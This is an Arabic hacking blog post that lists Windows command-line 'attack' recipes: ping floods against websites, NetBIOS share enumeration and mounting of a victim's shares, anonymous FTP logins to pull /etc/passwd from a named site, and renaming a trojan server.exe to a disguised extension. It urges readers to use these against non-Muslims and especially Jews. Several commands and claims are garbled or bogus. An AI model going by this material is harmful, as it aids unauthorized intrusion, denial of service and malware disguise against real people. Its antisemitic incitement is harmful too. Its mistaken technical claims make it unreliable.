اعلان

Website

المدونة

ملاحظات يجب قراءتها:

1. نتبرئ من استخدام أي موضوع في المدونة في طريق الحرام أو ضد المسلمين.
2. إن لم تجد الموضوع الذي بحثت عنه في محرك البحث، استخدم البحث الداخلي في المدونة.
3. هناك مراكز رفع ملفات تحتاج الى استعمال بروكسي للتحميل المجاني دون عمل حساب مدفوع مثل مركز رفع uploading.com
4. نعتذر عن عدم توفر بدائل لبعض الروابط المفقودة
5. الرجاء فحص الملفات جيداً قبل التشغيل فيما يخص أدوات الهاكرز و الفيديو..الخ
6. ليست كل البرامج كاملة و ليست كل البرامج تحتاج الى تسجيل!!؟؟
7. عزيزي الزائر تشرفنا بزيارتك، و أعلم أنك لست أول زائر و لن تكون الاخير بإذن الله تعالى، تمتع بتصفح المدونة دون مشاكل بإذن الله...
8. لا تنس استخدام (رسائل اقدم) لرؤية باقي مواضيع التصنيفات

انشاء المدونة

تم انشاء المدونة في:

07\01\2009

Black ice

كل عام و أنتم بألف خير بمناسبة مرور 4 سنوات على انشاء المدونة و الحمدلله

ĬŖŞĤ@ĮĐ مدونة الخدع و الشروحات إرشيد الجرايدة ĬŖŞĤ@ĮĐ

جارٍ التحميل...

{اخطر واغرب الأوامر بالدوس للهكر}



اخطر واغرب الأوامر بالدوس للهكر:
لتدمير المواقع:
ping -t www.***.com
هذا الأمر يقوم بالضغط على المضيف
ping -t -a -f www.***.com
اهاه هذا الأمر الشاطر ويقوم باعطاء الاوامر للمستضيف 
ping www.***.com
وهذا الأمر يقوم باعطاءك اي بي الموقع ويستخدم الاي بي للتدمير مثلاً بينج بعدها الاي بي
com/com.wav
com3/com3/.wav
com1/com.wav
وهذا الاوامر للهجوم اكتب الموقع وهذا الامر ولا الاي بي يكون افضل
ping -w timeout www.***.com
وهذا الامر يستعمل لمعرفة سرعة المواقع 
NETSTAT -S
هذي المنافذ في جهازك
NETSTAT -A
هذا الامر لترا المنافذ ومن مرتبط معك بالبروتكل يعني تشوف من يحاول يخترقك
NETSTAT -N
هذا الامر لأخراج الاي بي ارسل اي ملف لمن معاك على الماسنجر وهو يحمل اكتبة بيجيك الاي بي اخر شي على اليمين هذا هو واخر شي على اليسار يوو يعني انت
NETSTAT -P
هذا منافذ البروتكوكل
drwatson
هذا الامر لأخفاء الاي بي
والان هذا اوامر خطيرة
الإختراق عن طريق NetBios Attack 

هذه الثغرة تظهر بصورة خاصة إذا ما كان لديك Home Network أو أى نوع اخر من أنواع الشبكات مثل LAN أو WAN أو MAN وغيرها ، أيضا يمكن إختراق حاسبك الشخصى إذا كانت لديك تلك الثغرة.
وللتجربة على نفسك كمثال : إحصل على IP الخاص بجهازك بواسطة ذلك البرنامج الصغير المحمل في المرفقات مثلا .
1- بعد حصولك على IP سيظهر بالشكل التالى 207.107.1.1 ( هذا الرقم إفتراضى).

2- الان إذهب الى START ثم RUN ثم إكتب CMD لتفتح لك شاشة الدوس .

3- إكتب داخل شاشة الدوس Nbtstat –A IP ADRESS : لا تنسى أن تكتب IP الخاص بك مكان IP ADRESS ، ثم إضغط ENTER .

4- سيظهر لك الجدول التالى :
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
-------------------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1e> GROUP Registered
WORK <1d> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
ملحوظة : تم حذف المعلومات الأصلية من الجدول .

5- الرقم الظاهر ما بين <> يطلق عليه HEX CODE VALUE ، وما يهمنا هنا أن نجد رقم 20 ما بين الأقواس وهذا يعنى أننا لدينا PRINTER OR FILES SHARED TURNED ON ، وهو ما يعنى أننا لدينا شخص لدية ملفات وطابعة يمكن مشاركتها عبر الإنترنت وهذا عيب خطير في أنظمة التشغيل وثغرة خطيرة يمكن إستغلالها في إختراقه.

6- الان يمكنك التعرف على الملفات التى يمكن مشاركتها أو التغيير فيها والتلاعب بها كيفما تشاء وذلك بكتابة الأمر التالى في شاشة الدوس:
Net view \\

7- سوف يظهر لك الجدول التالى الذى يدل على وجود الملفات التى يمكن التلاعب فيها :
Shared resources at \\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk

8- الان يمكنك الدخول الى ملف TEMP والتلاعب فيه :
Net use x: \\\temp

طبعا إسلوب NSETBIOS مر بالعديد من التطورات ، نظرا لأن العديد من المستخدمين وأنظمة التشغيل قد تلافوا هذه الثغرة الخطيرة لديهم ، 

لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع 

User name-Password 

وهما يكونان محفوظين في ملف يسمي 

PASSWD غالبا 

بعض المواقع تضع هذا الملف في الإف تي بي 

ما هو إف تي بي؟ 

FTP=File Transfer Protocol بروتوكول نقل الملفات 

تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت 

start==>run إبدأ ثم تشغيل 

واكتب telnet 

سيفتح التلنت اضغط علىRemote System ==> connect 

ثم اكتب الموقع في Host Name مثلا 

kahane.org أو الآيبي الخاص به 

وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي 

ثم اضغط connect 

وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code 

user anonymous 

ثم انتر بعدها يطلب السيرفر كلمة السر اكتب 

pass zzzoozz@yahoo.com 

اكتب أي بريد ككلمة سر وطبعا سيكون وهميا 

ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح.. 

بعدها سنحصل على ملف الباسوورد 

قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل 

cute ftp - ws_ftp 

مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان 

ftp.kahane.org 

لتحصل على الملف في التلنت اكتب 

retr /etc/passwd 

/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع 

Sunos 5.0 etc/shadow او etc/passwd 
Linux etc/shadow او etc/passwd 
BSD4.3 –RENO etc/master.passwd 
AIX etc/security/passwd 
NT ويندوز ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/ghaaly.com/s/passwd 

وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها 
طريقة تغيير امتداد exe عن طريق الدوس جديد 

اتبع الخطوات التالية:- 
إبدأ>تشغيل>وأكتب command أو (start>runcopy server.exe server.com طبعا server هو اسم الباتش تبعك وممكن تغير الامتداد الى com,scr,bat إخواني المسلمين لاتستخدموا هذه الطريقة ضد إخوانكم المسلمين وانما استخدموها ضد الكفار كما هو هدف الموقع وبخوصا اليهود قاتلهم الله ولعنهم. 

وهذي ارامر النت ستات مرة ثانية
مايستطيع فعله netstat 

============================================== 

NETSTAT حالة الشبكة يظهر جميع المنافذ المتصلة 
NETSTAT مسافة-A يظهر ارقام الايبي المتصلة وحالتها 
NETSTAT مسافة-E يظهر حالة الشبكة بشكل عام 
NETSTAT مسافة-N يظهر ارقام البورتات والايبيات المتصلة 
NETSTAT مسافة-P يظهر البروتوكولات المتصلة بجهازك 
NETSTAT مسافة-R يظهر اجهزة الروترز في شبكتك 
NETSTAT مسافة-S يظهر حالة الشبكة والاجهزة المتصلة 

هذا اوامر للدخول الى جهاز الضحية:
FTP 
أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البورت 
21 
مفتوح و هو البورت الخاص بــ 
FTP 
و لتأكد من أن البورت مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من احسنها 
Superscanne 
بعدما تتأكد ان البورت مفتوح ننتقل الى الخطوة الثانية و هي 
إضغط على 
Start 
ثم 
Run 
ثم اكتب 
ftp –n 
تطلع لك نافدة في الدوس مكتوب عليها 
FTP&g 
لحد هنا كل شيء تمام 
و بعدين اكتب 
Open 
ثم إضغط على 
إدخال 
Enter 
تتحصل عب النتيجة التالية 
FTP&g 
To 
أكتب جنب 
To 
رقم IP الضحية ثم إضغط على إدخال 
و الحين اهم جزء 

إدا تحصلت على هذا الرد فقد تخطيت خطوة 
Connected to www.assassin.com 
220 websrv1 Microsoft FTP Service (Version 4.0). 
و الآن أكتب الكتابة التالية 
ftp&gquote user ftp 
إدا تحصلت على هذا الرد فقد تخطيت خطوة 
331 Anonymous acces allowed, send identify (e-mail name) as password. 
و الآن أكتب الكتابة التالية 
ftp&gquote cwd ~root 
إدا تحصلت على هذا الرد فقد تخطيت خطوة 
530 Please login with USER and PASS 
ثم أكتب الكتابة التالية 
ftp&gquote pass ftp 
إدا تحصلت على هذا الرد فقد تخطيت خطوة 
و نجحت في الإقتحام يعني الاختراق 

230 Anonymous user logged in. 
مبرووووك انت الحين في جهاز المسكين ذا الي بتحوسه 
ما عليك الآن الا ان تقوم بإستعمال 
اوامر الفتيبي 


الاوامر عشان تطبقوها مباشرةا بعد نجاح الاختراق 

Pwd 
لكي تعرف ما يحتويه الهارد ديسك 
Cd 
لإقتحام مجلد مثال 
Cd black 
في هدا المثال قمت بإقتحام مجلد المسمى بلاك 
Ls 
لكي يتضح لك محتوى المجلد أو الهارد ديسك 
Get 
لكي تحمل الى سطح المكتب بتاع جهازك 
مثال 
Get black.exe 
Put 
العملية العكسية ل 
Get 
يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في 
في جهاز الضحية 
مثال 
Put black.exe 
Clos 
لقطع الإتصال مع الضحية 

============
مرسلة بواسطة
التسميات:

ليست هناك تعليقات:

إرسال تعليق

الاشتراك في: تعليقات الرسالة (Atom)